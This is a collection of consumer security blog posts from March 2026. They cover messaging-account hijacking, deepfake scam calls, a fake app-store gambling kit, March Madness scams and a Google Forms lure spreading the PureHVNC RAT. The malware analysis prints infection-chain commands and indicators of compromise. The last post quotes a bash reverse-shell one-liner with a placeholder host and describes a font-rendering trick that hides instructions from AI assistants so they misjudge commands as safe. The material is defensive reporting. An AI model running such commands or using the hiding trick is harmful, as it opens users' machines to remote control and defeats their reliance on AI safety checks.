Normal view

FBI, CISA warn of Russian hackers hijacking Signal and WhatsApp accounts

24 March 2026 at 14:39

In a Public Service Announcement (PSA) the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) warn the public about ongoing Russian-linked phishing campaigns that aim to gain access to messaging accounts.

Earlier this month we wrote about a large‑scale phishing campaign aimed at hijacking Signal and WhatsApp accounts belonging to senior officials, military personnel, civil servants, and journalists.

Now the FBI and CISA have joined European intelligence services in warning that the same tactics are being used in a broader campaign targeting these commercial messaging apps. The goal is not to break end‑to‑end encryption, but to walk straight around it by stealing access to individual accounts.

In our previous article, we focused on warnings from the Dutch intelligence services AIVD and MIVD, which described how Russian state‑backed actors approached high‑value targets via Signal and WhatsApp, posing as “Signal Support”, “Signal Security Bot”, or similar. The PSA demonstrates how the same groups are now running global phishing campaigns against messaging app accounts, with evidence suggesting thousands of compromised accounts worldwide.

It’s important to reiterate that the attackers have not managed to break the apps’ end-to-end encryption. Instead, they are relying on social engineering to get a device added so they can eavesdrop on accounts.

The current targets include current and former US government officials, military staff, political figures, and journalists, but there is nothing to stop the same techniques being reused against businesses and everyday users.

So, while it’s tempting to dismiss this as a problem for diplomats and generals (and the agencies issuing these alerts do mention high‑profile targets first), the techniques scale very easily. Once playbooks like these are public, they tend to be copied by cybercriminals looking for new ways to steal money or accounts.

How to protect your accounts

As the PSA puts it:

“Phishing remains one of the most unsophisticated, yet effective means of cyber compromise, often rendering other protections irrelevant”

This calls asks for basic security measures:

  • Treat unsolicited messages from “Support” inside apps as suspicious by default. Legitimate support for apps like Signal and WhatsApp does not ask you, in a chat message, to send back verification codes, PINs, or passwords.​ If you receive a warning about account problems, do not follow links in the message. Open the app’s settings directly or visit the official website through other means.
  • Never share SMS verification codes or app PINs. SMS codes are there to prove that you control a phone number. Anyone who has the code can pretend to be you. App‑specific PINs or passcodes are there to protect account changes. Giving them away is like handing over the keys to your account. Consider anyone asking for them to be a scammer.
  • Be careful what you discuss and with whom. Both the Dutch and US advisories remind us that even with end‑to‑end encryption, some conversations are too sensitive for commercial chat apps.
  • Use the extra security features these apps offer. Enable options like registration lock, registration PIN and device‑change alerts so that your account cannot be silently re‑registered without an extra secret. Store your PIN in a password manager instead of choosing something easy to guess or reusing a common code, to reduce the chance of social engineering or shoulder‑surfing.
  • Another useful feature is disappearing messages. Short‑timer and disappearing messages reduce how much content is available if an attacker gets into a chat later, or if someone obtains long‑term access to a device or backup. They are not a complete solution, but they can limit the damage.

What to do if you think your account was hijacked

If you suspect an attacker has taken over your messaging account:

  1. Try to re‑register your number in the app immediately to kick out other devices.
  2. Revoke all linked devices and change any app‑specific PINs or lock codes.
  3. Warn your contacts that someone may have impersonated you and ask them to treat recent messages with caution.
  4. Review recent conversations for signs of data theft (for example, shared IDs, documents, or passwords that should now be considered exposed).
  5. Report the incident to the app provider and, where appropriate, to national reporting centers such as the FBI’s Internet Crime Complaint Center (IC3) at ic3.gov or the relevant authority in your country.​

The sooner you act, the smaller the window in which attackers can exploit your account.


We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Scam compounds hiring “AI models” to seal the deal in deepfake video calls

24 March 2026 at 13:18

Scam compounds in Southeast Asia have already become modern slave farms, trapping victims and forcing many of them to become scammers for them. Now they’ve added another type of worker to the mix: so-called AI models.

These professional scammers conduct video calls with their targets, charming them into handing over their cash. As reported in WIRED this week, recruitment ads describe roles handling around a hundred live video calls per day, promoting romance scams and crypto hustles in industrial-scale scam operations across Cambodia, Myanmar, and Laos. 

These scam farms already rely on chat operators to ensnare scam victims via messaging apps. Many of these operators are themselves victims of trafficking, forced to work long shifts under threats of violence. They develop relationships with victims over time, exploiting loneliness or financial worries. While they work to make a victim feel special, they’re actually juggling similar text sessions with dozens of people at once. Eventually, a victim may want a video call, either to meet their imagined sweetheart or to confirm an investment opportunity is legitimate (or both). 

Chat operators might not have the ability to charm victims on video, especially when they’re victims themselves, being made to work long shifts and are physically beaten.  So when a victim asks for a video call, the scam bosses call in a specialist “AI model” with strong interpersonal skills to charm the victim. Despite the name, they’re real people hired to appear on video calls. The AI deepfake software adjusts their looks to match the fictionalized person that the victim is hoping to see. 

Scam operations run recruitment ads for these models, and many seem willing to apply for these jobs. Humanity Research Consultancy, an investigative research group that tracks trafficking supply chains, identified a pitch from a 24-year-old Uzbekistani calling herself Angel. She claimed to speak four languages and to have a year’s experience as an AI model. She demanded $7,000 monthly for her services. 

The growth of scam compounds 

How do these scam compounds even exist? According to the Australian Strategic Policy Institute, Myanmar’s 2021 military coup helped fuel a fraud boom. Scam centers along the Thai border have more than doubled as crime syndicates move into that region, along with Myanmar, Cambodia and Laos. 

These scam centers are often tolerated because they line the coffers of local militia. But there have been some countermeasures. Raids and cross-border crackdowns have led to arrests and the movement of large numbers of suspects between countries, including operations targeting compounds such as KK Park in Myawaddy. Cambodia and Myanmar have also signalled increased efforts to tackle scam operations, although the networks remain highly resilient.

This kind of activity becomes easier as technology improves. Real-time face-swapping and deepfake tools are now good enough to support live video, not just pre-recorded clips. We’ve already seen real-time deepfakes used for everything from job interviews through to impersonating banking executives to scam millions. What’s new here is the scale: people handling dozens or even hundreds of calls a day for romance scams and crypto investment fraud shows that this is now a mass exploit. 

How to stay safe 

Here’s the problem with deepfake video: the common “tells” that let you spot it are evaporating. At one time a sure sign of an AI deepfake was someone with the wrong number of fingers or oddities in hairlines. You can up the ante in live calls by asking someone to turn sideways. Have them touch their nose, and wave their fingers in front of their face. It’s more difficult for deepfake software to handle that extra noise. 

But beware: the algorithms that produce deepfakes are getting better all the time, and more easily able to handle such tests. We’re at the point where this deepfake researcher says many more of us will be fooled by them this year. 

If you can’t fully trust what you see, fall back on what you know. Be wary of unsolicited contact, especially when someone quickly builds emotional rapport or introduces an investment opportunity. Even if a profile looks well-established or a website appears legitimate, take time to dig a little deeper.

Avoid sharing personal or financial information with someone you’ve only met online, and be wary of anyone who pushes you toward quick decisions or asks to move conversations off established platforms. The FBI has some sound advice on their website

The most dangerous part of this deepfake AI model trend is that it helps scam operations cross the final frontier. A live human can close a scam that a simple chat interaction can’t. That’s why people like Angel from Uzbekistan have a job, and why you need to be more on your guard than ever. 


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

FriendlyDealer mimics official app stores to push unvetted gambling apps

23 March 2026 at 16:41

We’ve identified a huge social-engineering campaign designed to steer people into online gambling sites under the impression they’re installing a legitimate app.

We’re calling it FriendlyDealer. It’s been observed across at least 1,500 domains, each hosting a website that impersonates the Google Play or Apple App Store. Users think they’re downloading a gambling app from a trusted source, with all the checks, reviews, and safeguards that implies. But they’re actually still on a website, installing a web app that then redirects them to casino offers through affiliate links.

The campaign doesn’t steal passwords or install traditional malware. Instead, it makes money through commissions every time someone signs up or deposits money at one of these sites.

That might sound less serious than a banking Trojan, but the end result is people being funneled into unregulated gambling sites with no age verification, no deposit limits, and no consumer protections. And it comes at a time when gambling addiction is being called the fastest explosion of gambling the country has ever seen. 

One kit, dozens of apps, built to mimic real app stores

FriendlyDealer is built as a single, reusable kit that can generate many different fake app listings.

The kit detects what device you’re using and shows you a different fake store accordingly. Android users see a fake Google Play Store. iPhone users see a fake Apple App Store. The kit even loads the correct system fonts for each platform (Google Sans on Android, San Francisco on iOS) so the typography matches what you’d expect on your own phone.

  • Fake Apple App Store page: BEAST GAMES: ICE FISHING by Mr. Beast
    Fake Apple App Store page: BEAST GAMES: ICE FISHING by Mr. Beast
  • Fake Apple App Store page: Euro Win
    Fake Apple App Store page: Euro Win

Under the hood, it’s a single web application that reads all of its content from one configuration file embedded in the page. Change that file, and you get a completely different app listing running on the same code.

The operators have used this to spin up at least twenty casino brands, from “Tower Rush” (189 deployments) to “Chicken Road” (97) to “BEAST GAMES: ICE FISHING” (43), which impersonates YouTube creator MrBeast. (It’s worth noting that some skins reuse the names of some legitimate gambling brands but none of these are affiliated with the operation.)

The reviews are fake. Different apps reuse identical usernames, profile photos, text, and developer replies, and they’re repeated across multiple brands. Before showing the fake store, the kit can also display a simple casino mini-game to build engagement.

The fake “Install” button on Android relies on a Chrome feature that only works on mobile. It captures Chrome’s install prompt and triggers it when tapped, so a real installation dialog appears. The usual warning about installing apps from unknown sources does not appear. Previous research has shown that apps installed this way can even display “Installed from Google Play Store” in your phone’s settings.

The code goes to extraordinary lengths to get you into the right browser. If you arrive through a Facebook or Instagram ad, you’re inside those apps’ built-in browser, which can’t trigger the install. On Android, the kit generates a special link that forces the page to reopen in Chrome. On iOS, it does the same thing but for Safari. If Chrome isn’t installed, the fallback sends you to the real Play Store to download it. There’s even a separate handler for Samsung’s browser. The browser-specific engineering is unusually detailed.

The page disables zooming, making close inspection harder. The kit assigns a per-user tracking ID and reuses it across analytics, event, push-registration, and offer-routing flows.

  • Fake Google Play page: BEAST GAMES: ICE FISHING by Mr. Beast
    Fake Google Play page: BEAST GAMES: ICE FISHING by Mr. Beast
  • Chicken road by Valor Casino
    Fake Google Play page: Chicken road by Valor Casino
  • Gates of Olympus by Casino
    Fake Google Play page: Gates of Olympus by Casino
  • Tower Rush by ELK Studios
    Fake Google Play page: Tower Rush by ELK Studios
  • Tower Rush by Galaxsys
    Fake Google Play page: Tower Rush by Galaxsys
  • Morospin by Morospin Inc.
    Fake Google Play page: Morospin by Morospin Inc.
  • Casino Mexico by Casino Mexico LLC
    Fake Google Play page: Casino Mexico by Casino Mexico LLC
  • Revolut Slots by RevGameDev
    Fake Google Play page: Revolut Slots by RevGameDev

The kit is wired for paid advertising. The configuration includes empty slots for tracking pixels from four ad platforms: Google, Yandex, Facebook, and TikTok. The app and background script can forward Facebook-style ad identifiers (_fbc / _fbp) when those values are available. The code references Yandex telemetry fields and ships with Russian-language comments and debug strings, which is consistent with a Russian-speaking development context, though those artefacts could also have been inherited from a reused or purchased kit.

The flow is straightforward: buy ad traffic, detect the device, show a fake app store, trigger a real-looking install, and redirect to a casino through an affiliate link. 

You’re not installing an app 

When a user taps Install, the page doesn’t actually download an app. Instead, the browser creates what’s called a Progressive Web App (PWA). It’s essentially a website that behaves like an app, with its own icon on your home screen and its own splash screen. To most people it’s indistinguishable from a real app.

Once installed, the app can keep running in the background using browser features called service workers (keeping a persistent connection to your device). The samples include the main PWA worker and code to register a separate push worker (to send you notifications) when enabled. 

The kit also knows when you’ve already installed it. It checks your device for its own PWA, and if it finds it, it skips the fake store entirely and sends you straight to the casino. 

One domain ties it all together

Every FriendlyDealer deployment phones home to the same domain: ihavefriendseverywhere[.]xyz. This is the campaign’s data-collection server, and the name that inspired our tracking name for the operation. 

The background script and app code send telemetry to this domain including browser language, timezone, user-agent data, optional user-agent client hints, campaign identifiers, and ad identifiers when those values are available. Much of this is sent via custom request headers.

Some requests use the HEAD method to stay lightweight.

The application code also sends something the background script doesn’t: JavaScript error reports. Every crash, every failed resource load, every unhandled exception that occurs on the victim’s device is caught, packaged into a structured error object with a timestamp and context, and posted to ihavefriendseverywhere[.]xyz/api/log_standard_err. In effect, the operators are collecting both user data and production error telemetry from real devices.

If a request fails (for example, due to poor signal), the background script stores it locally and retries later. Once the connection returns, the data is sent automatically.

The fake app also asks for notification permission. If the user grants it, the kit can register a push subscription and create a direct channel for future notifications. These appear like normal app notifications, giving the operators a direct line back to the user even after the app is closed.

Follow the money: affiliate commissions, not malware 

FriendlyDealer doesn’t spread viruses or take over devices. The entire operation runs on affiliate commissions. Each fake app store page contains a hidden redirect to an affiliate tracking network. When a user signs up or deposits money, the operator gets paid.

We found multiple affiliate tracking networks in the code. A per-user ID appears across the kit’s analytics, event, push, and offer-routing logic, allowing activity to be correlated across multiple stages of the funnel. 

This model explains the campaign’s enormous scale. Each domain is disposable. The kit is a template; change one configuration file and you have a new casino brand on a new domain in minutes. With gambling affiliate payouts reportedly ranging from $50 to $400 per depositing user, even a small conversion rate across a thousand domains adds up fast. 

Who’s behind this? 

We can’t attribute the campaign to a specific group, but there are clues. The source code contains Russian-language comments (for example, “Создаем таймер для измерения времени загрузки Vue “). One of the builds shipped with unstripped Russian debug strings that were scrubbed from the production version. The code integrates with Yandex Metrica, which is popular in Russia and the former Soviet states.

These point to a Russian-speaking development context, although the code could have been reused or purchased.

The code also contains affiliate marketing tags—preland-alias and preland-final-action—where a “pre-lander” is the page a visitor sees before the actual offer. The application code shows this tag controls the kit’s behavior: a value of 0 triggers a PWA install, while 1 redirects to an app store. Combined with plug-and-play ad pixel slots, per-deployment configuration, and staging/production logic, this strongly suggests a reusable kit built for multiple campaigns or operators, not a one-off project.

We found multiple builds of the same kit. The production version has debug messages removed, but other builds include full Russian-language error messages and support for Arabic numerals across the interface—download counts, ratings, review dates, and more. This does not look like a kit built for a single market; it appears designed to support regional variants at build time.

A familiar trick with a different payoff 

Fake app store pages are a known technique, often used to steal banking credentials or deliver spyware. FriendlyDealer uses the same playbook, a convincing fake store and a real-looking install flow, but with a different goal. It doesn’t take over your phone or steal your passwords. It steers you toward gambling platforms and earns a commission when you spend money.

The harm is financial rather than technical: victims are funneled toward gambling offers through deceptive install and redirect flows, and may end up depositing money at sites they did not intentionally choose. 

It’s also s a reminder that not every scam is after your passwords. Affiliate fraud, especially in online gambling, can fund enormous operations without ever touching a single credential. The people behind this built a factory: one template, twenty brands, more than 1,500 domains. Paid ads bring the traffic. The fake app stores seal the deal. The affiliate network pays the bills. 

What makes this effective is that it abuses things that are supposed to be trustworthy. Chrome’s app installation flow on Android and Safari’s “Add to Home Screen” on iPhone are both legitimate features, doing what they were designed to do. The problem is that the page triggering the install is a lie. The kit is carefully engineered so only the right users, on the right devices, coming from the right ads, ever see it. 

What to do if you installed one of these apps 

On Android: 

  • Remove the app: Long-press the icon and tap Uninstall, or go to Settings > Apps and remove anything you don’t recognize.
  • Clear the site data in Chrome: The app may leave data behind in your browser. Open Chrome > Settings > Site settings > All sites, find the site, and tap Clear & reset.
  • Check notification permissions: Go to Chrome > Settings > Notifications and remove any sites you don’t recognize. Uninstalling the app does not remove notification access.
  • Check other browsers: If you use Edge, Brave, or another Chromium-based browser, repeat the same steps there.

On iPhone: 

  • Remove the app: Long-press the app icon on your home screen and tap Remove App. On iOS, PWAs don’t install a background script the way they do on Android, so removing the icon also removes the cached site data. 
  • Clear the site data in Safari: Go to Settings > Safari > Advanced > Website Data, and search for the domain. Swipe to delete it. This clears any remaining cookies and stored data. 
  • Check notification permissions: Go to Settings > Apps > Safari. Scroll to the Settings for Websites section and tap Notifications. Find the site and remove or deny access.

If you deposited money after being routed through one of these pages and believe you were deceived, contact your bank or payment provider promptly. 

Indicators of Compromise (IOCs) 

Domains 

  • ihavefriendseverywhere[.]xyz—Data exfiltration and error-logging server 
  • valor[.]bet—Gate/checkpoint URL (/__pwa_gate path) 
  • wikis[.]lifestyle—Hardcoded domain reference in application code 

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

The March Madness scam playbook

23 March 2026 at 16:19

March Madness is the annual men’s and women’s NCAA Division I basketball tournament, where 68 teams play in a single-elimination bracket for the US national championship.

But March Madness doesn’t just bring buzzer beaters and busted brackets. It also kicks off a short, intense season for scammers who know fans are distracted, emotional, and often in a hurry. In this post, we’ll walk through the main scam patterns that pop up around the NCAA men’s basketball tournament, so you can recognize them and shut them down before they score.

Large sporting events combine three components that scammers love: money, emotion, and urgency. Fans are hunting for last‑minute tickets, “can’t‑miss” bets, and ways to watch every game. They’re in a hurry, so their guard is down.

From an attacker’s perspective, March Madness is conveniently predictable. Every year in March, millions of people will Google the same terms, click the same types of ads, and respond to the same social media bait. Once you’ve seen the patterns, you’ll start recognizing them around other major events too.

Fake ticket marketplaces and resale fraud

Ticket scams are a staple of any big concert, playoff series, or tournament, and March Madness is no exception.

The playbook is simple: Scammers set up sites and listings that look like legitimate ticket resellers, then take your money and run.

Things to keep an eye on:

  • Screenshots or PDFs of barcodes won’t work when entry tickets are dynamic or tied to an app, but scammers still sell them. Victims will only find out at the gate when tickets are rejected.
  • Too good to be true last‑minute deals. Offers for prime seats at prices well below the official box office, often paired with urgency imposing tactics: “must pay in the next 10 minutes,” “three buyers waiting,” or “I’ll lose my deposit if you don’t decide now.”
  • Sellers push victims into private channels (text, WhatsApp, DMs) and insist on payment methods that are irreversible, like wire transfers, P2P apps, gift cards, or cryptocurrencies.

Fake betting sites, “sure thing” tips, and bonus traps

Legal sports betting has gone mainstream in the US, and March Madness is one of its biggest events. The huge number of casual bettors is a scammer’s dream. Their tactics can be divided into two main categories:

  • Cloned betting platforms. Attackers create sites and apps that mimic real sportsbooks, complete with copied logos, odds feeds, and login pages. Users deposit funds, place bets, and maybe even see “winnings” pile up in the interface—until they try to withdraw and are hit with fees, extra deposits, silent account bans, or witness a disappearing act.
  • “Guaranteed” bets. Social media fills up with self‑proclaimed experts selling access to VIP betting groups or “guaranteed” locks on tournament games. Victims pay for tips or are funneled into shady offshore sites that conveniently lose their money or demand more deposits to “unlock” withdrawals.

Streaming scams

Not everyone has a cable subscription or an official streaming package, and scammers know many fans will look for free or cheap alternatives. That creates a fertile ground for malicious streaming offers. There are some common patterns to watch for:

  • Fake portals promising all the games live. Websites advertise free HD streams of every tournament game but require you to create an account and enter a credit card “for age verification” or a “free trial.” Once you submit details, charges appear or your card data is sold on.
  • Malicious players and extensions. Some sites will prompt you to download a special player, codec, or browser extension before you can watch. Instead of video, you get adware, browser hijackers, or a foothold for more serious malware.
  • Shortened URLs and reposted “official stream” links spread quickly around tip‑off time, often redirecting through multiple ad and tracking networks before landing on phishing or scam pages.
  • Like-farming and other social media clickbait promising free streams only to boost the account’s reputation for a next wave of scams.

Bracket phishing, office pools, and prize scams

Brackets are part of the culture: friends, families, and workplaces run pools where everyone predicts the tournament results. Scammers piggyback on that habit with phishing campaigns and fake prize draws. These usually show up in a few ways:

  • Official bracket challenge phishing. Emails or messages invite you to join a tournament bracket hosted by a big brand or media outlet, complete with logos and plausible wording. The link really leads to a credential‑harvesting page masquerading as your email, work SSO, or a well‑known sports site.
  • Fake “you won the pool” notifications. Messages claim you’ve won a prize in a bracket you never joined, and instruct you to click a link or provide personal and banking details to receive your payout.
  • All the data they can get for you to join. Some bracket or contest sites ask for far more information than necessary. They want your full address, date of birth, even ID numbers, all under the pretext of age verification or tax reporting. Once you provide them, the phishers will monetize the data.

How to stay safe

Defending yourself against March Madness scams isn’t about never betting or never buying tickets. But you should treat the entire tournament as a high-risk period and tighten up your usual habits.

While the underlying technical tricks may vary, the social engineering themes are consistent:

  • Urgency. Time is limited, for some reason. The goal is to stop you thinking.
  • Scarcity. Limited seats, limited odds boosts, limited contest spots. All designed to trigger FOMO.
  • Too good to be true. Playing on hope and excitement.
  • Authority and familiarity. Scammers use team logos, broadcaster branding, or language that mimics your employer’s internal pool announcements to appear legitimate.

The defenses are also much the same:

  • Think before you click, act, or buy. If something looks suspicious, check it with Scam Guard.
  • Type official URLs into the browser or use trusted apps instead of following links from email, DMs, or social posts.
  • Use protected payment methods. Pay with credit cards or other methods that support chargebacks and dispute resolution.
  • Treat all unsolicited and unexpected messages as suspicious.
  • Report incidents. If you think you have been scammed, report it to your bank, the FTC and via BBB’s Scam Tracker.

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

That “job brief” on Google Forms could infect your device

20 March 2026 at 12:38

We’ve identified a campaign using business-related lures, such as job interviews, project briefs, and financial document, to distribute malware, including the PureHVNC Remote Access Trojan (RAT).

It’s not the malware that’s new, but how the attack starts.

Instead of the usual phishing email or fake download page, attackers are using Google Forms to kick off the infection chain. The attack typically begins when a victim downloads a business-themed ZIP file linked from a Google Form. Inside is a malicious file that sets off a multi-stage infection process, eventually installing malware on the system.

What is PureHVNC?

PureHVNC is a modular .NET RAT from the “Pure” malware family. In simple terms, it gives attackers remote control over an infected device and lets them steal sensitive information.

Once installed, it can:

  • Take control of the system and run commands remotely.
  • Collect information about the device, including operating system, hardware, security software, and info about the user and connected devices.
  • Steal data from browsers, extensions and crypto wallets.
  • Extract data from apps like Telegram and Foxmail.
  • Install additional plugins.
  • Achieve persistence in several ways (for example, via scheduled tasks).

Different lures, same goal: compromise your device

In our research, we found multiple Google Forms hosting links to malicious ZIP files that start the infection chain. These forms are convincing, impersonating real company names, logos and links. LinkedIn is one of the platforms used to send links to these malicious forms.

  • Fake Google Forms that distribute malicious ZIPs.
  • The attackers impersonate real companies
  • Well-known brands are impersonated to lend credibility

The forms typically ask for professional information (experience, background, etc.), making them feel like part of a real recruitment or business process.

  • Information requested from the user to make the form appear legitimate.
    Information requested from the user to make the form appear legitimate.
  • Information requested from the user to make the form appear legitimate.
    More information.

The forms link to ZIP files hosted on:

  • File-sharing services such as Dropbox, filedn.com, and fshare.vn
  • URL shorteners such as tr.ee and goo.su
  • Google redirect links that obscure the final destination

The ZIP archives use various names and are tied to different business-related themes (marketing, interviews, projects, job offers, budgets, partnerships, benefits) to avoid suspicion, for example:

  • {CompanyName}_GlobalLogistics_Ad_Strategy.zip
  • Project_Information_Summary_2026.zip
  • {CompanyName} Project 2026 Interview Materials.zip
  • {CompanyName}_Company_and_Job_Overview.pdf.rar
  • Collaboration Project with {CompanyName} Company 2026.zip

The lures use the names of well-known companies, particularly in the financial, logistic, technology, sustainability and energy sectors. Impersonating legitimate organizations add credibility to their campaign.

What happens after you download the file

The ZIP archives usually contain legitimate files (such as PDFs of job descriptions) and an executable file along with a DLL, typically named msimg32.dll. The DLL is executed via DLL hijacking (tricking a legitimate program into loading malicious code), although the technique has undergone multiple modifications and upgrades over time.

Legitimate PDFs are present in some ZIP files, like this one pretending to be a job description from a real company.
Legitimate PDFs are present in some ZIP files, like this one masquerading as a real job description.

Analysis of the malicious campaign

We identified multiple variants of this campaign, each using different methods to extract the archive, distinct Python code, and varying folder structures. Across these variants, the campaign typically includes an executable file along with a DLL hidden in a separate folder. In some cases, attackers also include legitimate files related to the lure’s theme, enhancing the overall credibility of the attack.

Example of files present in one of the archives analyzed.
Example of files present in one of the archives analyzed.

The malicious code is present in the DLL, and carries out various operations, including:

  • Decrypting strings with a simple XOR, in this case with the “4B” key.
  • Detecting debugging and sandboxing with IsDebuggerPresent() and time64(), and displaying the error “This software has expired or debugger detected” if triggered.
  • Deleting itself, then dropping and launching a fake PDF.
  • Achieving persistence via the registry key CurrentVersion\Run\Miroupdate.
  • Extracting the “final.zip” archive and running it.

In this case, the PDF was started with the following command:

cmd.exe /c start "" "C:\Users\user\Desktop\Marketing Director Assessment Project\Marketing_Director_Assessment_Project.pdf"

The PDF opened during the infection chain.
The PDF opened during the infection chain.

The archive final.zip is unzipped using different commands across the analyzed campaigns into a random folder under ProgramData. In this example, the tar command is used:

cmd.exe /c tar -xf "C:\ProgramData\{random folder}\{random folder \final.zip" -C "C:\ProgramData\{random folder \{random folder} " >nul 2>&1

The zip contains several files associated with Python and the next stage.

Python files compressed into a random folder in ProgramData.
Python files compressed into a random folder in ProgramData.

Next, an obfuscated Python script called config.log is executed. It ultimately decodes and runs a Donut shellcode. This script appears under different names (e.g., image.mp3) and formats in the different chains analyzed.

"C:\ProgramData\{random folder}\{random folder}\pythonw.exe" "C:\ProgramData\{random folder}\{random folder}\config.log"

Obfuscated Python script that ultimately loads the Donut shellcode.
Obfuscated Python script that ultimately loads the Donut shellcode.

At the end of the infection chain, PureHVNC was injected into SearchUI.exe. The injected process may vary across the analyzed samples.

PureHVNC executes the following WMI queries to gather information about the compromised device:

  • SELECT * FROM AntiVirusProduct
  • SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
  • SELECT Caption FROM Win32_OperatingSystem

For persistence, it creates a scheduled task using a base64-PowerShell command, with the flag “-RunLevel Highest” if the user has admin rights.

PowerShell command for the Scheduled Task

PureHVNC performs enumeration to exfiltrate information related to various browsers, extensions, and cryptocurrency wallets.

Methods related to wallet and browser data exfiltration.
Methods related to wallet and browser data exfiltration.
Methods related to wallet and browser data exfiltration.

The malware configuration is encoded with base64 and compressed with GZIP.

In this case, the configuration includes:

  • C2: 207.148.66.14
  • C2 ports: 56001, 56002, 56003
  • Campaign ID: Default 
  • Sleeping Flag: 0
  • Persistence Path: APPDATA
  • Mutex Name: Rluukgz 

How to stay safe

Using Google Forms is a highly effective method for distributing malware. Attackers are relying on trust in familiar tools like Google Forms, Dropbox, and LinkedIn, and impersonating legitimate companies to get past your guard.

If you deal with job offers, partnerships, or project work online, this is worth paying attention to:

  • Always check the origin of Google Forms, don’t enter sensitive information, and don’t download files unless you fully trust the source.
  • Verify requests through official company channels before engaging.
  • Be wary of links hidden behind URL shorteners or redirects.

Indicators of Compromise (IOCs)

IP

207.148.66.14

URL

https://goo[.]su/CmLknt7

https://www.fshare[.]vn/file/F57BN4BZPC8W

https://tr[.].ee/R9y0SK

https://dl.dropbox[.]com/scl/fi/52sgtk50j285hmde2ycry/Overview-of-the-MSI-Accounting-Project.rar?rlkey=9qmunvcp8oleeycld08gqwup9

HASH

ca6bd16a6185c3823603b1ce751915eaa60fb9dcef91f764bef6410d729d60b3

d6b7ab6e5e46cab2d58eae6b15d06af476e011a0ce8fcb03ba12c0f32b0e6386

e7b9f608a90bf0c1e477a28f41cb6bd2484b997990018b72a87268bf46708320

e221bb31e3539381d4753633443c1595bd28821ab6c4a89ad00ea03b2e98aa00

7f9225a752da4df4ee4066d7937fe169ca9f28ecddffd76aa5151fb72a57d54b

e0ced0ea7b097d000cb23c0234dc41e864d1008052c4ddaeaea85f81b712d07c

b18e0d1b1e59f6e61f0dcab62fecebd8bcf4eb6481ff187083ea5fe5e0183f66

85c07d2935d6626fb96915da177a71d41f3d3a35f7c4b55e5737f64541618d37

b78514cfd0ba49d3181033d78cb7b7bc54b958f242a4ebcd0a5b39269bdc8357

fe398eb8dcf40673ba27b21290b4179d63d51749bc20a605ca01c68ee0eaebbc

1d533963b9148b2671f71d3bee44d8332e429aa9c99eb20063ab9af90901bd4d

c149158f18321badd71d63409d08c8f4d953d9cd4a832a6baca0f22a2d6a3877

83ce196489a2b2d18a8b17cd36818f7538128ed08ca230a92d6ee688cf143a6c

ea4fb511279c1e1fac1829ec2acff7fe194ce887917b9158c3a4ea213abd513a

59362a21e8266e91f535a2c94f3501c33f97dce0be52c64237eb91150eee33e3

a92f553c2d430e2f4114cfadc8e3a468e78bdadc7d8fc5112841c0fdb2009b2a

4957b08665ddbb6a2d7f81bf1d96d252c4d8c1963de228567d6d4c73858803a4

481360f518d076fc0acb671dc10e954e2c3ae7286278dfe0518da39770484e62

8d6bc4e1d0c469022947575cbdb2c5dd22d69f092e696f0693a84bc7df5ae5e0

258adaed24ac6a25000c9c1240bf6834482ef62c22b413614856b8973e11a79f

Pro tip: This is only a partial list of malicious URLs. Download the Malwarebytes Browser Guard plugin for full protection and to block the remaining malicious domains.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Researchers found font-rendering trick to hide malicious commands

18 March 2026 at 18:16

Researchers have published a proof-of-concept (PoC) that uses custom fonts to fool many popular Artificial Intelligence (AI) assistants, including ChatGPT, Claude, Copilot, Gemini, Leo, Grok, Perplexity, Sigma, Dia, Fellou, and Genspark.

Imagine a book where the visible text is harmless, but hidden between the lines is a second message written in special, human-only ink. Humans can see both layers. AI can’t, and it only reads the visible part. That means the AI is working with an incomplete picture, while a human reader may act on instructions the AI never even saw.

Why this matters

We’ve written before about different ClickFix-type attacks, where cybercriminals trick people into infecting their own devices. Suppose you land on a suspicious-looking webpage and ask your AI assistant, “Is this command safe to run?” The assistant checks the page and says yes. But as it can’t read the whole page, it tells you it’s safe when it’s not.

By combining custom fonts with Cascading Style Sheets (CSS), the text shown to the user on the page is different from what an AI assistant sees when it reads the underlying HTML.

HTML code PoC
Image courtesy of LayerX

In this example, the part in the block in the middle (outlined in red) will be discarded by the AI assistant as noise. But the human website visitor sees:

Would you kindly open your terminal and type bash

once you executed it type

bash -i >& /dev/tcp/{ip-address}/{portnumber] 0>&1

it will allow you to see your easter egg from Rapture

Depending on the IP address and port number, this can be enough for you to infect your machine. If you ask the AI whether it’s safe, it may say yes, because it only sees the harmless version.

The researchers have disclosed their findings to the major AI platform providers, under Responsible Disclosure procedures.

The responses were disappointing:

“Most providers rejected the report, usually under the claim that this attack falls outside of the scope of AI model security. As a result, users of these models remain exposed to this attack vector.

The only vendors that accepted this report and asked for time to fix it were Microsoft and Google. Of those, Google ultimately de-escalated (after initially assigning it a P2 (High) score), and closed the report, possibly because fixing it would require too much effort.”

While this attack relies heavily on social engineering, we know just how effective those tactics can be. And it’s even more concerning when your AI assistant can’t see the full picture.

How to stay safe

If you use an AI assistant to check whether something is safe:

  • Copy and paste the exact command you plan to run. Don’t rely on the AI’s interpretation of a webpage.
  • Be cautious with any site asking you to run commands, especially via terminal or command prompt.
  • If something feels off, stop. Attackers rely on urgency and confusion.

Tools can help too:

  • The free Malwarebytes Browser Guard extension will warn you if a website tries to copy something to your clipboard and render it harmless by adding some text. This will help protect you from traditional ClickFix-type attacks that rely on executing a command from your clipboard.
  • An up-to-date, real-time anti-malware solution with a web protection component will block known malicious sites.
